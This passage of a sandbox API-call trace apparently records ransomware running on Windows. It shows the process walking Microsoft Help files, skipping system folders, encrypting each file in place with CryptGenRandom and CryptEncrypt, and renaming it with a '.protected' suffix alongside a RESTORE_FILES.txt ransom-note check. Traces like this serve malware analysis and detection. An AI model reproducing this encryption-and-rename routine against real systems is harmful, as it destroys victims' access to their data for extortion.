SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.564] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.565] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.565] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.565] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.565] CloseHandle (hObject=0xa4) returned 1 [0072.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.protected") returned 66 [0072.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.protected")) returned 1 [0072.566] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.566] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.566] lstrcmpW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.566] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.566] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.566] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.566] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.567] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.567] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.567] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.568] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.568] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.568] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.568] CloseHandle (hObject=0xa4) returned 1 [0072.568] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.protected") returned 70 [0072.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.protected")) returned 1 [0072.569] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="Windows") returned -1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="Program Files") returned -1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.569] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.569] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.569] lstrcmpW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.569] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.569] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.579] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.579] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.579] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.579] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.579] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.579] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.579] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.579] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.580] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.603] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.603] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.603] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.603] CloseHandle (hObject=0xa4) returned 1 [0072.603] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.protected") returned 67 [0072.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.protected")) returned 1 [0072.604] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.604] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.604] lstrcmpW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.604] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.604] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.604] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.605] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.605] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.605] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.606] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.606] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.606] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.606] CloseHandle (hObject=0xa4) returned 1 [0072.607] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.protected") returned 71 [0072.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.protected")) returned 1 [0072.607] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="Windows") returned -1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="Program Files") returned -1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.607] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.607] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.607] lstrcmpW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.607] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.607] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.607] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.608] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.608] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.608] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.608] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.608] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.608] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.609] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.609] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.609] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.609] CloseHandle (hObject=0xa4) returned 1 [0072.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.protected") returned 66 [0072.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.protected")) returned 1 [0072.610] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="Windows") returned -1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="Program Files") returned -1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.610] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.610] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.610] lstrcmpW (lpString1="MS.VISIO.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.628] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.629] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.629] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.629] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.629] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.629] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.629] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.630] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.630] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.630] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.630] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.630] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.630] CloseHandle (hObject=0xa4) returned 1 [0072.631] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.protected") returned 64 [0072.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.protected")) returned 1 [0072.631] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.631] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.631] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.631] lstrcmpW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.631] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.631] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.631] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.632] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.632] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.632] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.632] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.632] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.632] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.632] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, 